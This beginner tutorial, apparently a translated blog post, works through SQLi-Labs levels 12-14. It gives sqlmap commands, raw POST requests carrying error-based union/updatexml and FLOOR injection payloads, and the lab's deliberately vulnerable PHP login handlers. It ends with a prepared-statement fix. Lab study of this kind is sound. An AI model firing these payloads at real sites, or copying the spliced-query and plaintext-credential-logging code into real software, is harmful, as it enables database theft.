# [MySQL SQL injection] [Beginner] Using SQLi-Labs, part 2 (Less 12-14)

These levels mainly test closing the surrounding query context in POST-based SQL injection.

## Less-12 - POST - Error Based- Double quotes- String

### 1) Key points

Mainly tests error-based injection where the input is closed with double quotes.

### 2) Tool usage:

One of sqlmap's POST injection usages: mark the injection point with a `*` inside `--data`; the `-r` option (replaying a saved request file) can also be used.

```bash
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-12/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES
```

### 3) Manual injection

```http
POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

uname=111") UNION ALL SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
```

### 4) Code at the injection point

```php
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    // logging the connection parameters to a file for analysis.
    // (the submitted credentials are appended to result.txt in plaintext)
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';   // double-quote closure: the raw input is wrapped in "..."
    $passwd='"'.$passwd.'"';
    // effective query: ... WHERE username=("<input>") and password=("<input>") ...
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    // rest of the handler (result/error output) is not shown in the post
}
```

## Less-13- Double Injection- String- with twist

### 1) Key points

Mainly tests error-based injection where the input is closed with a single quote plus a parenthesis.

### 2) Tool usage:

```bash
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES
```

### 3) Manual injection

```http
POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

uname=111') union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
```

Or use the FLOOR()-based error:

```http
uname=-2672') OR 1 GROUP BY CONCAT(0x7E,(SELECT DATABASE()),0x7E,FLOOR(RAND(0)*2)) HAVING MIN(0)#&passwd=11&submit=Submit
```

### 4) Code that produces the injection point

```php
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    // logging the connection parameters to a file for analysis.
    // (the submitted credentials are appended to result.txt in plaintext)
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    // single-quote + parenthesis closure: the raw input lands inside ('...')
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    // rest of the handler (result/error output) is not shown in the post
}
```

## Less-14- Double Injection- Double quotes- String

### 1) Tool usage:

```bash
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES
```

### 2) Manual injection

```http
POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

uname=111" union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit
```

### 3) Code that produces the injection point

```php
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    // logging the connection parameters to a file for analysis.
    // (the submitted credentials are appended to result.txt in plaintext)
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';   // double-quote closure, this time without parentheses
    $passwd='"'.$passwd.'"';
    // effective query: ... WHERE username="<input>" and password="<input>" ...
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    // rest of the handler (result/error output) is not shown in the post
}
```
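As an added example that is not part of the post or of sqli-labs, here is the Less-12/13/14 login handler rewritten so that the closing context (`("...")`, `('...')` or `"..."`) no longer matters: the query is a mysqli prepared statement with bound parameters, MySQL error text is no longer echoed, and the plaintext credential log is dropped. It assumes the lab's `users` table, a `password` column holding `password_hash()` output rather than plaintext, and `$dbHost`/`$dbUser`/`$dbPass`/`$dbName` defined in an included config file.

```php
<?php
// Added example (not sqli-labs code): Less-12/13/14 login with a prepared
// statement. Assumes the `users` table, hashed passwords, and the four
// $db* connection variables coming from an included config file.
declare(strict_types=1);

function findUserByName(mysqli $con, string $uname): ?array
{
    // The SQL text contains no user data; $uname travels as a bound
    // parameter, so the closure the lab relies on is irrelevant. An input
    // such as  111") UNION ALL SELECT 1,updatexml(...) #  is compared
    // verbatim against the username column and simply matches nothing.
    $stmt = $con->prepare(
        'SELECT username, password FROM users WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // needs mysqlnd (assumed)
    $stmt->close();
    return $row ?: null;
}

function login(mysqli $con, string $uname, string $passwd): bool
{
    $row = findUserByName($con, $uname);
    // Verify against the stored hash instead of comparing the plaintext
    // password inside the WHERE clause as the lab does.
    return $row !== null && password_verify($passwd, $row['password']);
}

if (isset($_POST['uname'], $_POST['passwd'])) {
    // Throw on driver errors instead of echoing them: the error message is
    // exactly the channel that updatexml()/floor() payloads read from.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    try {
        $con = new mysqli($dbHost, $dbUser, $dbPass, $dbName); // assumed config
        $ok  = login($con, (string) $_POST['uname'], (string) $_POST['passwd']);
    } catch (mysqli_sql_exception $e) {
        error_log($e->getMessage()); // server-side log only, never the response
        $ok = false;
    }
    // No result.txt with raw credentials: log the outcome and username only,
    // which is also what a detection rule for closure attempts would inspect.
    error_log(sprintf('login %s for %s', $ok ? 'ok' : 'failed', $_POST['uname']));
    http_response_code($ok ? 200 : 401);
    echo $ok ? 'Login successful' : 'Login failed';
}
```

The same change covers all three levels because the injection depends on the input being spliced into the SQL text, not on which quoting surrounds it.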
Original article: https://www.cnblogs.com/17bdw/p/5529025.html